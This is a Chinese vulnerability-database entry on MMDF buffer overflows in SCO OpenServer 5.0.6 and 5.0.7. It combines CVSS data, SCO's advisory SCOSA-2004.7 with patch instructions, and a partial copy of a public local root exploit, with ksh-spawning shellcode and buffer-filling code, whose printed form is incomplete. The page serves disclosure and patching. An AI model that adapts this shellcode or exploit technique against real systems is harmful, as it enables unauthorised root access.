发布时间 :2004-12-23 00:00:00
修订时间 :2016-10-17 22:45:49

[原文]Multiple buffer overflows in MMDF on OpenServer 5.0.6 and 5.0.7, and possibly other operating systems, may allow attackers to execute arbitrary code, as demonstrated via the execmail program.

[CNNVD]OpenServer MMDF多个缓冲区溢出漏洞(CNNVD-200412-101)

        另外MMDF存在NULL指针废弃和Core Dump问题,可导致应用程序崩溃,

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(UNKNOWN)  BUGTRAQ  20041027 MMDF deliver local root exploit for SCO OpenServer 5.0.7 x86
(VENDOR_ADVISORY)  XF  openserver-mmdf-bo(16738)

- 漏洞信息

OpenServer MMDF多个缓冲区溢出漏洞
高危 边界条件错误
2004-12-23 00:00:00 2005-10-20 00:00:00
        另外MMDF存在NULL指针废弃和Core Dump问题,可导致应用程序崩溃,

- 公告与补丁

        OpenServer 5.0.7
         4.1 Location of Fixed Binaries
         SCO OpenServer Release 5.0.7 Maintenance Pack 3及之后版本也包含此补丁:

        OpenServer 5.0.6
         5.1 Location of Fixed Binaries

- 漏洞信息 (602)

SCO Openserver 5.0.7 (MMDF deliver) Local Root Exploit (EDBID:602)
sco local
2004-10-26 Verified
0 Ramon Valle
N/A [点击下载]
 *  MMDF deliver local root exploit for SCO OpenServer 5.0.7 x86
 *  Copyright 2004 Ramon de Carvalho Valle

char shellcode[]=           /*  36 bytes                          */
    "\x68\xff\xf8\xff\x3c"  /*  pushl   $0x3cfff8ff               */
    "\x6a\x65"              /*  pushl   $0x65                     */
    "\x89\xe6"              /*  movl    %esp,%esi                 */
    "\xf7\x56\x04"          /*  notl    0x04(%esi)                */
    "\xf6\x16"              /*  notb    (%esi)                    */
    "\x31\xc0"              /*  xorl    %eax,%eax                 */
    "\x50"                  /*  pushl   %eax                      */
    "\x68""/ksh"            /*  pushl   $0x68736b2f               */
    "\x68""/bin"            /*  pushl   $0x6e69622f               */
    "\x89\xe3"              /*  movl    %esp,%ebx                 */
    "\x50"                  /*  pushl   %eax                      */
    "\x50"                  /*  pushl   %eax                      */
    "\x53"                  /*  pushl   %ebx                      */
    "\xb0\x3b"              /*  movb    $0x3b,%al                 */
    "\xff\xd6"              /*  call    *%esi                     */

main(int argc,char **argv) {
    char buffer[16384],address[4],*p;
    int i;

    printf("MMDF deliver local root exploit for SCO OpenServer 5.0.7 x86\n");
    printf("Copyright 2004 Ramon de Carvalho Valle\n\n");

    *((unsigned long *)address)=(unsigned long)buffer-256+5120+4097;

    for(i=0;i<5120;i++) *p++=address[i%4];
    for(i=0;i<8192;i++) *p++=0x90;
    for(i=0;i<strlen(shellcode);i++) *p++=shellcode[i];


// [2004-10-26]

- 漏洞信息 (F34740)

osx86_mmdfdeliver.c (PacketStormID:F34740)
2004-10-26 00:00:00
Ramon de C Valle  

MMDF deliver local root exploit for SCO OpenServer 5.0.7 x86.

- 漏洞信息 (F33830)

SCOSA-2004.7.txt (PacketStormID:F33830)
2004-07-20 00:00:00

SCO Security Advisory - Multiple vulnerabilities have been found in the MMDF binaries included with SCO Openserver versions 5.0.6 and 5.0.7. These include buffer overflows, null dereferences, and core dumps.

Hash: SHA1


			SCO Security Advisory

Subject:		OpenServer 5.0.6 OpenServer 5.0.7 : MMDF Various buffer overflows and other security issues
Advisory number: 	SCOSA-2004.7
Issue date: 		2004 July 14
Cross reference: 	sr884728 fz528322 erg712434 CAN-2004-0510 CAN-2004-0511 CAN-2004-0512

1. Problem Description

	Deprotect discovered a buffer overflow in execmail.  After reviewing 
	our code we determined the whole MMDF package needed a security audit.

	Various buffer overflows and other security issues that affect all 
	MMDF binaries have been corrected. 

	All but one of the MMDF binaries that were setuid root are no 
	longer setuid. 

	Additional changes in this version of MMDF are documented at
	and in the updated man pages which are included in SCOSA-2004.7

	The Common Vulnerabilities and Exposures project (
        has assigned MMDF buffer overflows the name CAN-2004-0510.

	The Common Vulnerabilities and Exposures project (
        has assigned MMDF null dereferences the name CAN-2004-0511.

	The Common Vulnerabilities and Exposures project (
        has assigned MMDF core dumps the name CAN-2004-0512.

2. Vulnerable Supported Versions

	System			Binaries
	OpenServer 5.0.6 	MMDF Distribution
	OpenServer 5.0.7 	MMDF Distribution

3. Solution

	The proper solution is to install the latest packages.

4. OpenServer 5.0.7

	4.1 Location of Fixed Binaries

	The fixes are also available in SCO OpenServer Release 5.0.7 
	Maintenance Pack 3 or later.  See

5. OpenServer 5.0.6   

	5.1 Location of Fixed Binaries

	5.2 Verification

	MD5 (VOL.000.000) = 7d079342022ff408e479184fab3ee86b

	md5 is available for download from

	5.3 Installing Fixed Binaries

	Upgrade the affected binaries with the following sequence:

	1) Download the VOL* files to a directory

	2) Run the custom command, specify an install from media
	images, and specify the download directory as the location of
	the images.

6. References

	Specific references for this advisory:

	SCO security resources:

	SCO security advisories via email

	This security fix closes SCO incidents sr884728 fz528322

7. Disclaimer

	SCO is not responsible for the misuse of any of the information
	we provide on this website and/or through our security
	advisories. Our advisories are a service to our customers
	intended to promote secure installation and use of SCO

8. Acknowledgments

	SCO would like to thank Deprotect which describes itself 
	as "a Swedish based security company divided into four 
	divisions; Managed Security Services, Security Services, 
	Products and Development and our Security Academy."


Version: GnuPG v1.2.4 (SCO/UNIX_SVR5)


- 漏洞信息

SCO OpenServer MMDF execmail Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

A remote overflow exists in OpenServer. The execmail program fails to validate user input resulting in a buffer overflow. With a specially crafted request, an attacker can cause privilege escalation to root resulting in a loss of integrity.

- 时间线

2004-02-06 Unknow
2004-10-27 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, SCO has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

- 漏洞信息

SCO Multi-channel Memorandum Distribution Facility Multiple Vulnerabilities
Boundary Condition Error 10758
Yes Yes
2004-07-20 12:00:00 2009-07-12 06:16:00
Discovery of the buffer overflow vulnerabilities is credited to the analysts at Deprotect. The individuals responsible for the discovery of the other issues are currently unknown; they were disclosed in the referenced vendor advisory.

- 受影响的程序版本

+ SCO Open Server 5.0.7
+ SCO Open Server 5.0.6 a
+ SCO Open Server 5.0.6

- 漏洞讨论

It has been reported that the SCO Multi-channel Memorandum Distribution Facility (MMDF) is affected by multiple vulnerabilities. These issues are due to a failure of the utility to properly validate buffer boundaries when copying user-supplied input.

These issues are known to be exploitable locally, however due to the nature of the application it is likely that remote exploitation is possible as well, although this is not confirmed.

An attacker might leverage these issues to execute arbitrary code in the context of the vulnerable utility; many of the affected utilities are setuid binaries by default. These issues might also be leveraged to cause the affected utility to crash, denying service to legitimate users.

- 漏洞利用

The following exploit is made available by Ramon de Carvalho Valle &lt;;:

- 解决方案

SCO has released advisory SCOSA-2004.7 along with fixes dealing with this issue.


- 相关参考